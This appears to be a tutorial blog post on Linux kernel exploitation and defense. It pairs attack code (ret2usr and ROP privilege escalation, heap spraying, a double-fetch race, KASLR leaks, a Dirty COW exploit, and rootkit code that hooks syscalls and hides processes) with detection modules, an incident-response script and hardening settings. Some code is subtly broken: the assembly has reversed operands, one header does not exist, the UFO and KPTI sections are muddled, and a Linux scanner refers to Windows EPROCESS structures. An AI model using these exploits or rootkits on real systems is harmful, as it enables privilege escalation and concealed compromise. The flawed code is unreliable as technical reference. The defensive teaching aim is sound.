Linux Kernel Exploitation and Defense: Understanding Attack Techniques and Building Robust Defenses
Understanding how kernel exploits work is crucial for building effective defenses. This comprehensive guide explores common kernel exploitation techniques, analyzes real-world vulnerabilities, and provides practical defensive strategies to protect against sophisticated attacks.
The Kernel Attack Landscape
Why Target the Kernel?
The kernel represents the ultimate target for attackers:
- Complete System Control: Kernel compromise means game over
- Bypass All Security: Disable SELinux, AppArmor, and other protections
- Persistent Access: Install undetectable rootkits
- Data Exfiltration: Access all memory and files
- Hardware Control: Direct access to devices and firmware
Common Vulnerability Classes
/* 1. Buffer Overflow - Classic stack/heap overflow */static int vulnerable_ioctl(unsigned long arg) { char buffer[64]; struct user_input input;
// Vulnerable: No size validation if (copy_from_user(&input, (void __user *)arg, sizeof(input))) return -EFAULT;
// Stack overflow if input.size > 64 if (copy_from_user(buffer, input.data, input.size)) return -EFAULT;
return 0;}
/* 2. Use-After-Free (UAF) */struct vulnerable_struct { void (*callback)(void); int data;};
static void trigger_uaf(void) { struct vulnerable_struct *vuln = kmalloc(sizeof(*vuln), GFP_KERNEL);
vuln->callback = legitimate_function; kfree(vuln);
// UAF: Using freed memory vuln->callback(); // Attacker can control this}
/* 3. Race Condition */static int refcount = 0;static struct resource *shared_resource;
static int vulnerable_open(struct inode *inode, struct file *file) { // Race window between check and use if (refcount > 0) return -EBUSY;
// Another thread can increment refcount here
refcount++; shared_resource = allocate_resource(); return 0;}
/* 4. Integer Overflow */static int vulnerable_alloc(unsigned int count, unsigned int size) { void *buffer;
// Integer overflow: count * size can overflow buffer = kmalloc(count * size, GFP_KERNEL); if (!buffer) return -ENOMEM;
// Later code assumes buffer is count*size bytes return 0;}
/* 5. Information Leak */static long vulnerable_read(char __user *buf, size_t count) { struct kernel_data data;
// Uninitialized stack variable // May contain sensitive kernel data
data.public_field = 0x41414141; // data.private_field is uninitialized!
if (copy_to_user(buf, &data, sizeof(data))) return -EFAULT;
return sizeof(data);}
Exploitation Techniques
1. ret2usr - Return to Userspace
// Exploit technique: Redirect kernel execution to user-controlled code
/* Vulnerable kernel code */struct ops { void (*func)(void);};
static void vulnerable_function(struct ops *user_ops) { struct ops *ops;
ops = kmalloc(sizeof(*ops), GFP_KERNEL);
// Vulnerable: Trusting user pointer if (copy_from_user(ops, user_ops, sizeof(*ops))) { kfree(ops); return; }
// Call user-controlled function pointer ops->func(); // Can point to userspace!}
/* Exploit code */#include <stdio.h>#include <sys/mmap.h>
// Exploit payload in userspacevoid exploit_payload(void) { // We're in kernel context but executing user code! __asm__( // Disable SMEP/SMAP if needed "mov cr4, rax\n" "and rax, ~(1 << 20)\n" // Clear SMEP bit "mov rax, cr4\n"
// Elevate privileges "mov rax, 0\n" // prepare_kernel_cred(0) "call prepare_kernel_cred\n" "mov rdi, rax\n" "call commit_creds\n" // commit_creds(prepare_kernel_cred(0))
// Return to userspace "swapgs\n" "iretq\n" );}
int main() { struct ops evil_ops = { .func = exploit_payload };
// Trigger vulnerable ioctl ioctl(fd, VULNERABLE_IOCTL, &evil_ops);
// We should have root now system("/bin/sh");}
2. ROP/JOP - Code Reuse Attacks
/* ROP Chain Construction */
// Find gadgets in kernel// gadget 1: pop rdi; ret// gadget 2: mov cr4, rdi; ret// gadget 3: prepare_kernel_cred// gadget 4: commit_creds
unsigned long rop_chain[] = { POP_RDI_RET, // gadget 1 CR4_VALUE_NO_SMEP, // value for cr4 MOV_CR4_RDI_RET, // gadget 2 POP_RDI_RET, // gadget 1 0, // NULL for prepare_kernel_cred PREPARE_KERNEL_CRED,// gadget 3 POP_RDI_RET, // gadget 1 // Return value from previous call goes to rdi COMMIT_CREDS, // gadget 4 USERSPACE_RETURN // Clean return to userspace};
/* Trigger overflow with ROP chain */void trigger_exploit(void) { char buffer[512];
// Fill buffer to overflow point memset(buffer, 'A', 64);
// Overwrite return address with ROP chain memcpy(buffer + 64, rop_chain, sizeof(rop_chain));
// Trigger vulnerable syscall syscall(VULNERABLE_SYSCALL, buffer, sizeof(buffer));}
3. Kernel Heap Exploitation
/* Heap Spray Technique */
// Step 1: Spray kernel heap with controlled objectsvoid heap_spray(void) { int spray_fds[SPRAY_COUNT];
for (int i = 0; i < SPRAY_COUNT; i++) { // Each open() allocates kernel structures spray_fds[i] = open("/dev/null", O_RDONLY);
// Control content via ioctl ioctl(spray_fds[i], SET_CALLBACK, controlled_data); }}
// Step 2: Create holes in heapvoid create_holes(void) { // Close every other fd to create holes for (int i = 0; i < SPRAY_COUNT; i += 2) { close(spray_fds[i]); }}
// Step 3: Trigger UAF to allocate in holevoid trigger_uaf(void) { // Vulnerable driver allocates in our controlled hole ioctl(vuln_fd, TRIGGER_UAF, size_matching_hole);}
/* SLUB Cache Exploitation */struct target_object { void (*fn_ptr)(void); char buffer[56];};
void exploit_slub(void) { // 1. Allocate many objects in same cache int fds[256]; for (int i = 0; i < 256; i++) { fds[i] = open("/dev/vuln", O_RDONLY); }
// 2. Free some to create free list for (int i = 0; i < 256; i += 2) { close(fds[i]); }
// 3. Overflow into free list pointer char overflow[128]; memset(overflow, 'A', 64); *(unsigned long *)(overflow + 64) = CONTROLLED_ADDRESS;
ioctl(fds[1], OVERFLOW_IOCTL, overflow);
// 4. Next allocation returns our controlled address int evil_fd = open("/dev/vuln", O_RDONLY);
// 5. Write to arbitrary address write(evil_fd, shellcode, sizeof(shellcode));}
4. Race Condition Exploitation
/* Double-Fetch Vulnerability */
// Vulnerable kernel codestatic long vulnerable_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { struct user_request req; void *buffer;
// First fetch - TIME-OF-CHECK if (copy_from_user(&req, (void __user *)arg, sizeof(req))) return -EFAULT;
if (req.size > MAX_SIZE) return -EINVAL;
buffer = kmalloc(req.size, GFP_KERNEL);
// Second fetch - TIME-OF-USE if (copy_from_user(&req, (void __user *)arg, sizeof(req))) return -EFAULT;
// req.size could have changed! if (copy_from_user(buffer, req.data, req.size)) // Overflow! return -EFAULT;
return 0;}
/* Exploit using racing threads */#include <pthread.h>
struct user_request *shared_req;volatile int stop_race = 0;
void *race_thread(void *arg) { while (!stop_race) { shared_req->size = 64; // Valid size usleep(1); shared_req->size = 1024; // Overflow size usleep(1); } return NULL;}
void exploit_double_fetch(void) { pthread_t thread;
shared_req = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
shared_req->size = 64; shared_req->data = exploit_buffer;
pthread_create(&thread, NULL, race_thread, NULL);
// Trigger race - will eventually hit the window for (int i = 0; i < 10000; i++) { ioctl(fd, VULNERABLE_IOCTL, shared_req); }
stop_race = 1; pthread_join(thread, NULL);}
Advanced Exploitation: Bypassing Mitigations
1. Bypassing KASLR
/* Information Leak to Defeat KASLR */
// Method 1: Side-channel via prefetchunsigned long leak_kernel_base(void) { unsigned long min_addr = 0xffffffff80000000; unsigned long max_addr = 0xffffffffc0000000; unsigned long kernel_base = 0;
for (unsigned long addr = min_addr; addr < max_addr; addr += 0x100000) { unsigned long time1 = rdtsc();
// Prefetch instruction __asm__ volatile("prefetcht0 (%0)" : : "r"(addr));
unsigned long time2 = rdtsc();
// Kernel addresses take less time (in cache) if (time2 - time1 < THRESHOLD) { kernel_base = addr & ~0xfffff; // Align to 2MB break; } }
return kernel_base;}
// Method 2: Kernel pointer leakstruct leaked_data { unsigned long kernel_ptr; char padding[56];};
unsigned long find_kernel_base(int fd) { struct leaked_data data;
// Trigger info leak vulnerability ioctl(fd, LEAK_IOCTL, &data);
// Calculate base from leaked pointer // Kernel text is usually at offset 0 return data.kernel_ptr & 0xffffffffff000000;}
2. Bypassing SMEP/SMAP
/* Native Code to Disable SMEP/SMAP */
// CR4 register bits#define CR4_SMEP (1 << 20)#define CR4_SMAP (1 << 21)
void disable_smep_smap(void) { unsigned long cr4;
// Read current CR4 __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
// Clear SMEP and SMAP bits cr4 &= ~(CR4_SMEP | CR4_SMAP);
// Write back - requires kernel privilege __asm__ volatile("mov %0, %%cr4" : : "r"(cr4));}
/* ROP Gadget Method */// Find gadgets:// pop rdi; ret// mov cr4, rdi; ret
unsigned long rop_disable_protections[] = { GADGET_POP_RDI, CR4_VALUE_NO_SMEP_SMAP, GADGET_MOV_CR4_RDI, // Continue exploitation...};
3. Bypassing KPTI
/* KPTI Bypass via Kernel Memory Layout Knowledge */
// KPTI separates user/kernel page tables// But some pages must be mapped in both
struct kpti_bypass { // Target KPTI trampoline pages unsigned long trampoline_addr;
// Or target cpu_entry_area (always mapped) unsigned long cpu_entry_addr;};
// Use these always-mapped regions for exploitationvoid exploit_with_kpti(void) { // Place shellcode in user-kernel shared region void *shared = mmap(FIXED_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_SHARED, -1, 0);
memcpy(shared, kernel_shellcode, sizeof(kernel_shellcode));
// Redirect execution to shared region trigger_vulnerability(FIXED_ADDR);}
Real-World Vulnerability Analysis
CVE-2016-5195 (Dirty COW)
/* Dirty COW - Race condition in get_user_pages */
// Vulnerable code path (simplified)int get_user_pages(unsigned long start, int nr_pages, int write, struct page **pages) { // ... if (write && !pte_write(pte)) { // Copy-on-write handling // RACE WINDOW: Between check and action do_wp_page(mm, vma, address, pte); } // ...}
/* Exploit Implementation */#include <sys/mman.h>#include <fcntl.h>#include <pthread.h>#include <string.h>
void *map;int f;struct stat st;char *name;
void *madvise_thread(void *arg) { while (1) { madvise(map, st.st_size, MADV_DONTNEED); } return NULL;}
void *write_thread(void *arg) { int f = open("/proc/self/mem", O_RDWR); while (1) { // Write to private mapping -> triggers COW lseek(f, (unsigned long)map, SEEK_SET); write(f, "hacked", 6); } return NULL;}
void exploit_dirtycow(char *filename) { pthread_t pth1, pth2;
f = open(filename, O_RDONLY); fstat(f, &st);
// Create private mapping of file map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
// Race MADV_DONTNEED with write pthread_create(&pth1, NULL, madvise_thread, NULL); pthread_create(&pth2, NULL, write_thread, NULL);
// Wait for exploitation pthread_join(pth1, NULL); pthread_join(pth2, NULL);}
CVE-2017-1000112 (UFO Vulnerability)
/* UFO (UDP Fragment Offload) Exploit */
// Vulnerable code - integer overflow in UFOstatic int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len) { // ... if (up->pending) { // Fragment handling // Integer overflow in size calculation mtu = dst_mtu(&rt->dst);
// Overflow here! if (len > mtu - sizeof(struct udphdr)) fragment_size = len / (mtu - sizeof(struct udphdr)); } // ...}
/* Exploit trigger */void trigger_ufo_overflow(void) { int sock = socket(AF_INET, SOCK_DGRAM, 0); struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(1337), .sin_addr.s_addr = inet_addr("127.0.0.1") };
// Set up UFO int val = 1; setsockopt(sock, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
// Trigger overflow with crafted size char buffer[65507]; // Max UDP size memset(buffer, 'A', sizeof(buffer));
// This triggers integer overflow in kernel sendto(sock, buffer, sizeof(buffer), MSG_MORE, (struct sockaddr *)&addr, sizeof(addr));}
Kernel Rootkit Techniques
1. System Call Table Hooking
/* Classic Syscall Hooking */
// Find syscall tableunsigned long *find_syscall_table(void) { unsigned long *syscall_table; unsigned long int i;
// Search for sys_close reference for (i = PAGE_OFFSET; i < ULLONG_MAX; i += sizeof(void *)) { syscall_table = (unsigned long *)i;
if (syscall_table[__NR_close] == (unsigned long)sys_close) return syscall_table; }
return NULL;}
// Hook implementationasmlinkage long (*original_open)(const char __user *, int, umode_t);
asmlinkage long hooked_open(const char __user *filename, int flags, umode_t mode) { char fname[256];
// Copy filename from userspace strncpy_from_user(fname, filename, sizeof(fname));
// Hide rootkit files if (strstr(fname, "rootkit")) { return -ENOENT; }
return original_open(filename, flags, mode);}
void install_hook(void) { unsigned long *syscall_table = find_syscall_table();
// Disable write protection write_cr0(read_cr0() & ~X86_CR0_WP);
// Save original and install hook original_open = (void *)syscall_table[__NR_open]; syscall_table[__NR_open] = (unsigned long)hooked_open;
// Re-enable write protection write_cr0(read_cr0() | X86_CR0_WP);}
2. VFS Hooking
/* File Operations Hooking */
struct file_operations *get_fop(const char *path) { struct file *file;
file = filp_open(path, O_RDONLY, 0); if (IS_ERR(file)) return NULL;
return (struct file_operations *)file->f_op;}
// Hook directory operationsint (*original_iterate)(struct file *, struct dir_context *);
int hooked_iterate(struct file *file, struct dir_context *ctx) { int ret = original_iterate(file, ctx);
// Filter out hidden entries // Complex implementation needed to properly filter
return ret;}
void hook_vfs(void) { struct file_operations *fops;
fops = get_fop("/"); original_iterate = fops->iterate_shared;
// Disable write protection and hook disable_wp(); fops->iterate_shared = hooked_iterate; enable_wp();}
3. Kernel Object Manipulation
/* Direct Kernel Object Manipulation (DKOM) */
// Hide process by unlinking from task listvoid hide_process(pid_t pid) { struct task_struct *task;
// Find task task = pid_task(find_vpid(pid), PIDTYPE_PID); if (!task) return;
// Remove from task list list_del(&task->tasks);
// Remove from PID hash detach_pid(task, PIDTYPE_PID);}
// Hide network connectionsvoid hide_tcp_port(unsigned short port) { struct sock *sk; struct hlist_nulls_node *node;
// Iterate TCP hash table sk_nulls_for_each(sk, node, &tcp_hashinfo.ehash[port].chain) { if (sk->sk_num == port) { // Remove from hash table sk_nulls_del_node_init_rcu(sk); } }}
Detection and Defense Strategies
1. Runtime Kernel Protection
/* Kernel Runtime Security Monitor */
#include <linux/kprobes.h>#include <linux/ptrace.h>
// Monitor critical functionsstatic struct kprobe kp_commit_creds = { .symbol_name = "commit_creds",};
static int handler_commit_creds(struct kprobe *p, struct pt_regs *regs) { struct cred *new = (struct cred *)regs->di;
// Check for privilege escalation if (new->uid.val == 0 && current_uid().val != 0) { pr_alert("Privilege escalation detected! PID: %d\n", current->pid);
// Kill the process force_sig(SIGKILL);
return 1; // Skip original function }
return 0;}
// Monitor module loadingstatic int module_notifier(struct notifier_block *nb, unsigned long action, void *data) { struct module *mod = data;
if (action == MODULE_STATE_COMING) { // Verify module signature if (!mod->sig_ok) { pr_alert("Unsigned module blocked: %s\n", mod->name); return NOTIFY_BAD; }
// Check for rootkit patterns if (is_rootkit_pattern(mod)) { pr_alert("Suspected rootkit blocked: %s\n", mod->name); return NOTIFY_BAD; } }
return NOTIFY_OK;}
static struct notifier_block module_nb = { .notifier_call = module_notifier,};
int init_protection(void) { // Register kprobes kp_commit_creds.pre_handler = handler_commit_creds; register_kprobe(&kp_commit_creds);
// Register module notifier register_module_notifier(&module_nb);
return 0;}
2. Exploit Detection
/* Stack Pivot Detection */
void check_stack_pivot(struct pt_regs *regs) { unsigned long stack_start = current->stack; unsigned long stack_end = stack_start + THREAD_SIZE;
// Check if RSP points outside stack if (regs->sp < stack_start || regs->sp > stack_end) { pr_alert("Stack pivot detected! PID: %d RSP: %lx\n", current->pid, regs->sp);
// Dump registers for analysis show_regs(regs);
// Terminate process force_sig(SIGSEGV); }}
/* ROP/JOP Detection */
#define MAX_RET_DEPTH 10
int detect_rop_chain(unsigned long *stack_ptr) { int ret_count = 0; unsigned long addr;
for (int i = 0; i < 100; i++) { if (get_user(addr, &stack_ptr[i])) break;
// Check if address is a 'ret' instruction if (is_ret_instruction(addr)) { ret_count++;
if (ret_count > MAX_RET_DEPTH) { pr_alert("ROP chain detected!\n"); return 1; } } else { ret_count = 0; } }
return 0;}
3. Kernel Integrity Monitoring
/* Critical Structure Monitoring */
struct integrity_check { void *address; size_t size; u8 hash[32]; // SHA-256};
static struct integrity_check critical_structures[] = { { &sys_call_table, sizeof(sys_call_table), {0} }, { &idt_table, sizeof(idt_table), {0} }, { &security_ops, sizeof(security_ops), {0} },};
void check_kernel_integrity(void) { u8 current_hash[32];
for (int i = 0; i < ARRAY_SIZE(critical_structures); i++) { // Calculate current hash calculate_sha256(critical_structures[i].address, critical_structures[i].size, current_hash);
// Compare with stored hash if (memcmp(current_hash, critical_structures[i].hash, 32)) { pr_alert("Kernel structure modified: %p\n", critical_structures[i].address);
// Trigger incident response kernel_integrity_violated(); } }}
/* Periodic Integrity Timer */static struct timer_list integrity_timer;
void integrity_timer_callback(struct timer_list *t) { check_kernel_integrity();
// Re-arm timer mod_timer(&integrity_timer, jiffies + HZ * 60); // Every minute}
4. Advanced Rootkit Detection
/* Hidden Process Detection */
void detect_hidden_processes(void) { struct task_struct *task; pid_t *pid_list; int count = 0;
// Method 1: Compare /proc with task list rcu_read_lock(); for_each_process(task) { if (!proc_pid_lookup(task->pid)) { pr_alert("Hidden process found: PID %d\n", task->pid); } } rcu_read_unlock();
// Method 2: Check scheduling queues detect_scheduler_manipulation();
// Method 3: Memory scanning for EPROCESS structures scan_memory_for_processes();}
/* Syscall Table Restoration */
void restore_syscall_table(void) { unsigned long *table = find_syscall_table();
// Restore from known good copy disable_wp(); memcpy(table, original_syscall_table, __NR_syscalls * sizeof(unsigned long)); enable_wp();
pr_info("Syscall table restored\n");}
Building Secure Kernel Modules
Secure Coding Practices
/* Secure Module Template */
#include <linux/module.h>#include <linux/kernel.h>#include <linux/security.h>
// Use proper error handlingstatic int secure_open(struct inode *inode, struct file *file) { int ret;
// Validate inputs if (!inode || !file) return -EINVAL;
// Check permissions ret = security_file_permission(file, MAY_READ); if (ret) return ret;
// Use GFP_KERNEL_ACCOUNT for user-triggered allocations file->private_data = kzalloc(sizeof(struct private_data), GFP_KERNEL_ACCOUNT); if (!file->private_data) return -ENOMEM;
return 0;}
// Proper cleanupstatic int secure_release(struct inode *inode, struct file *file) { // Clear sensitive data if (file->private_data) { memzero_explicit(file->private_data, sizeof(struct private_data)); kfree(file->private_data); }
return 0;}
// Input validationstatic long secure_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { struct user_request req;
// Bounds check command if (_IOC_TYPE(cmd) != SECURE_IOC_MAGIC) return -ENOTTY;
if (_IOC_NR(cmd) > SECURE_IOC_MAXNR) return -ENOTTY;
// Safe copy from user if (copy_from_user(&req, (void __user *)arg, sizeof(req))) return -EFAULT;
// Validate all fields if (req.size > MAX_REQUEST_SIZE) return -EINVAL;
// Use exact allocation size void *buffer = kmalloc(req.size, GFP_KERNEL); if (!buffer) return -ENOMEM;
// Process request...
kfree(buffer); return 0;}
Module Hardening
/* Hardened Module Initialization */
static int __init secure_module_init(void) { int ret;
// Verify kernel version compatibility if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 10, 0)) { pr_err("Kernel version too old\n"); return -EINVAL; }
// Check security frameworks if (!security_module_enable("capability")) { pr_err("Required security module not available\n"); return -EINVAL; }
// Register with strict permissions ret = misc_register(&secure_device); if (ret) { pr_err("Failed to register device\n"); return ret; }
// Set restrictive permissions secure_device.this_device->devt->mode = 0600;
// Initialize security features init_random_key(); setup_integrity_checking();
pr_info("Secure module loaded\n"); return 0;}
// Protect against forced unloadstatic void __exit secure_module_exit(void) { // Verify authorized unload if (!authorized_unload()) { pr_err("Unauthorized module unload attempt\n"); return; // Refuse to unload }
// Clean up securely destroy_crypto_keys(); misc_deregister(&secure_device);}
module_init(secure_module_init);module_exit(secure_module_exit);
MODULE_LICENSE("GPL");MODULE_AUTHOR("Security Team");MODULE_DESCRIPTION("Hardened kernel module");MODULE_VERSION("1.0");
// Enforce signature requirementMODULE_INFO(sig_enforce, "Y");
Incident Response
Kernel Compromise Response
#!/bin/bashecho "Kernel Incident Response Script"echo "=============================="
# 1. Isolate the systemecho "Isolating system..."iptables -P INPUT DROPiptables -P OUTPUT DROPiptables -P FORWARD DROP
# 2. Collect evidenceecho "Collecting evidence..."mkdir -p /evidence/{memory,disk,logs}
# Dump kernel memoryinsmod /tools/lime.ko "path=/evidence/memory/kernel.lime format=lime"
# Save system stateps auxww > /evidence/system_processes.txtnetstat -an > /evidence/network_connections.txtlsmod > /evidence/loaded_modules.txtmount > /evidence/mounted_filesystems.txt
# Copy critical logscp -r /var/log/* /evidence/logs/dmesg > /evidence/logs/dmesg.txt
# 3. Check for rootkitsecho "Checking for rootkits..."rkhunter --check --skip-keypresschkrootkit
# 4. Analyze kernel integrityecho "Checking kernel integrity..."cat /proc/kallsyms > /evidence/kallsyms.txtcat /proc/modules > /evidence/modules.txt
# Compare with known good valuesdiff /evidence/kallsyms.txt /secure/baseline/kallsyms.txt
# 5. Look for persistence mechanismsecho "Checking persistence..."find / -type f -perm -4000 -ls > /evidence/suid_files.txtcrontab -l > /evidence/crontab.txtsystemctl list-unit-files > /evidence/systemd_units.txt
echo "Initial response complete. System isolated."
Live Forensics
/* Live Kernel Memory Analysis */
#include <linux/module.h>#include <linux/kallsyms.h>#include <linux/slab.h>
void analyze_kernel_memory(void) { unsigned long *syscall_table; void *commit_creds_addr;
// Find critical functions syscall_table = (unsigned long *)kallsyms_lookup_name("sys_call_table"); commit_creds_addr = (void *)kallsyms_lookup_name("commit_creds");
pr_info("Syscall table at: %p\n", syscall_table); pr_info("commit_creds at: %p\n", commit_creds_addr);
// Check for hooks if (syscall_table[__NR_open] != kallsyms_lookup_name("sys_open")) { pr_alert("sys_open is hooked!\n"); pr_alert("Hooked address: %lx\n", syscall_table[__NR_open]); }
// Scan for inline hooks check_inline_hooks(commit_creds_addr);}
/* Memory Pattern Scanner */void scan_for_shellcode(void) { struct page *page; void *addr;
// Common shellcode patterns unsigned char patterns[][8] = { {0x48, 0x31, 0xc0, 0x48, 0x89, 0xc7, 0xe8}, // xor rax,rax; mov rdi,rax; call {0x0f, 0x01, 0xf8, 0x65, 0x48, 0x89, 0x24}, // swapgs; mov [rsp],reg {0x0f, 0x05, 0x48, 0x89, 0xc7, 0xe8}, // syscall; mov rdi,rax; call };
for_each_zone_page(page) { if (!page || PageReserved(page)) continue;
addr = kmap_atomic(page);
for (int i = 0; i < ARRAY_SIZE(patterns); i++) { if (memmem(addr, PAGE_SIZE, patterns[i], sizeof(patterns[i]))) { pr_alert("Shellcode pattern found at %p\n", page_address(page)); } }
kunmap_atomic(addr); }}
Prevention Best Practices
1. Secure Development
/* Security Checklist for Kernel Modules */
// ✓ Input validationif (!access_ok(user_buffer, size)) return -EFAULT;
// ✓ Bounds checkingif (index >= ARRAY_SIZE(array)) return -EINVAL;
// ✓ Integer overflow protectionif (count > SIZE_MAX / size) return -EOVERFLOW;
// ✓ Use safe string functionsstrscpy(dest, src, sizeof(dest));
// ✓ Proper lockingmutex_lock(&resource_mutex);// ... critical section ...mutex_unlock(&resource_mutex);
// ✓ Error handlingptr = kmalloc(size, GFP_KERNEL);if (!ptr) return -ENOMEM;
// ✓ Cleanup on error pathserror_path: kfree(allocated_memory); mutex_unlock(&lock); return ret;
2. Runtime Protections
# Kernel hardening checklistcat > /etc/sysctl.d/99-security.conf << EOF# Kernel exploit mitigationkernel.kptr_restrict = 2kernel.dmesg_restrict = 1kernel.perf_event_paranoid = 3kernel.yama.ptrace_scope = 2kernel.unprivileged_bpf_disabled = 1
# Memory protectionsvm.mmap_min_addr = 65536vm.mmap_rnd_bits = 32vm.mmap_rnd_compat_bits = 16
# Disable dangerous featureskernel.sysrq = 0kernel.core_uses_pid = 1kernel.modules_disabled = 1EOF
3. Monitoring and Alerting
/* Kernel Security Event Monitor */
static void security_event(enum event_type type, const char *msg) { struct audit_buffer *ab;
ab = audit_log_start(NULL, GFP_KERNEL, AUDIT_KERNEL); if (!ab) return;
audit_log_format(ab, "security_event=%d msg=%s pid=%d uid=%d", type, msg, current->pid, current_uid().val); audit_log_end(ab);
// Send to userspace monitor netlink_send_alert(type, msg);}
Conclusion
Kernel security is an ongoing battle between attackers and defenders. Understanding exploitation techniques is crucial for building effective defenses. Key takeaways:
- Assume Breach: Design systems assuming kernel compromise is possible
- Defense in Depth: Layer multiple security mechanisms
- Monitor Everything: Detection is as important as prevention
- Stay Updated: New techniques emerge constantly
- Test Security: Regular penetration testing and audits
The kernel will always be a high-value target. By understanding both attack and defense techniques, we can build more resilient systems and respond effectively when compromises occur.
Resources
- Kernel Exploitation Resources
- Linux Kernel Security Documentation
- KSPP (Kernel Self Protection Project)
- Linux Kernel CVE Database
Next: Linux Kernel Observability and Tracing - Understanding System Behavior with ftrace, perf, and eBPF